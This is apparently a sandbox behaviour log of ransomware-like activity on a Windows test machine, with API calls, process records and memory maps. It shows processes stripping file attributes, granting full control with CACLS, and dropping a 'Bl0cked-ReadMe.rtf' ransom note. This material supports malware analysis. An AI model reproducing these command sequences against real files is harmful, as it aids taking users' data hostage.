1 [0235.519] GetStartupInfoW (in: lpStartupInfo=0x18f3bc | out: lpStartupInfo=0x18f3bc*(cb=0x44, 
lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0235.519] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0235.519] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18f45c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f4a8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", lpProcessInformation=0x18f4a8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb74, dwThreadId=0xbbc)) returned 1 [0235.525] CloseHandle (hObject=0x50) returned 1 [0235.525] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0235.525] GetEnvironmentStringsW () returned 0x252340* [0235.525] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.525] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0235.562] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x18f39c | out: lpExitCode=0x18f39c*=0x0) returned 1 [0235.562] CloseHandle (hObject=0x4c) returned 1 [0235.562] _vsnwprintf (in: _Buffer=0x18f4e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f3a8 | out: _Buffer="00000000") returned 8 [0235.562] 
SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0235.562] GetEnvironmentStringsW () returned 0x252340* [0235.562] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.562] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0235.562] GetEnvironmentStringsW () returned 0x252340* [0235.562] FreeEnvironmentStringsW (penv=0x252340) returned 1 [0235.562] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f400 | out: lpAttributeList=0x18f400) [0235.562] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.562] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.563] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.563] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.563] SetConsoleInputExeNameW () returned 0x1 [0235.563] GetConsoleOutputCP () returned 0x1b5 [0235.563] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.563] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.563] exit (_Code=0) Process: id = "643" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0xf68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "642" os_parent_pid = "0x828" cmd_line = "CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], 
"LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35523 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35524 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35525 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35526 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 35527 start_va = 0x590000 end_va = 0x598fff entry_point = 0x590000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 35528 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35529 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35530 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35531 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35532 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35533 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35534 start_va = 0x20000 
end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35535 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35536 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35537 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 35538 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35539 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35540 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35541 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35542 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35543 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: 
"c:\\windows\\system32\\sechost.dll") Region: id = 35544 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 883 os_tid = 0xd40 Thread: id = 884 os_tid = 0xb0c Process: id = "644" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "642" os_parent_pid = "0x828" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35545 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35546 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 35547 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 35548 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 35549 start_va = 0x560000 end_va = 0x566fff entry_point = 0x560000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 35550 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = 
mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35551 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35552 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35553 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 35554 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35555 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35556 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35557 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35558 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 35559 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35560 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 35561 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = 
"kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35562 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35563 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35564 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35565 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35566 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35567 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35568 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35569 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35570 start_va = 0x773e0000 end_va = 0x7742dfff 
entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35571 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35572 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 35573 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35574 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 885 os_tid = 0xbbc Process: id = "645" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xaac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35575 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" 
Region: id = 35576 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35577 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35578 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35579 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35580 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35581 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35582 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35583 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 35584 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35667 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35668 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35669 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 
region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35670 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 35671 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 35672 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35673 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35674 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35675 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35676 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35677 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35678 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 35679 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35680 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35681 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 35682 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35683 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35684 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35685 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35686 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35687 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35688 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 35689 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 35690 start_va = 0x1140000 end_va = 0x12a2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 886 os_tid = 0xc00 [0236.092] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7c4 | out: lpSystemTimeAsFileTime=0x2ef7c4*(dwLowDateTime=0xc02f0280, dwHighDateTime=0x1d440a9)) [0236.092] GetCurrentProcessId () returned 0xaac [0236.092] GetCurrentThreadId () returned 0xc00 [0236.092] GetTickCount () returned 0x40cbc [0236.092] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7bc | out: lpPerformanceCount=0x2ef7bc*=29288126219) returned 1 [0236.093] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0236.093] __set_app_type (_Type=0x1) [0236.093] __p__fmode () returned 0x76b331f4 [0236.093] __p__commode () returned 0x76b331fc [0236.093] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0236.093] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0236.093] GetCurrentThreadId () returned 0xc00 [0236.093] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc00) returned 0x38 [0236.093] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.093] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0236.093] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.094] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.094] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef754 | out: phkResult=0x2ef754*=0x0) returned 0x2 [0236.094] VirtualQuery (in: lpAddress=0x2ef78b, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.094] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0236.094] GetConsoleOutputCP () returned 0x1b5 [0236.094] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.094] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0236.094] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.094] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0236.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0236.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.095] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.095] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.095] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0236.096] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.096] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0236.100] 
GetEnvironmentStringsW () returned 0x450188* [0236.100] FreeEnvironmentStringsW (penv=0x450188) returned 1 [0236.101] GetEnvironmentStringsW () returned 0x450188* [0236.101] FreeEnvironmentStringsW (penv=0x450188) returned 1 [0236.101] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6c4 | out: phkResult=0x2ee6c4*=0x40) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0xb0, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0236.101] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, 
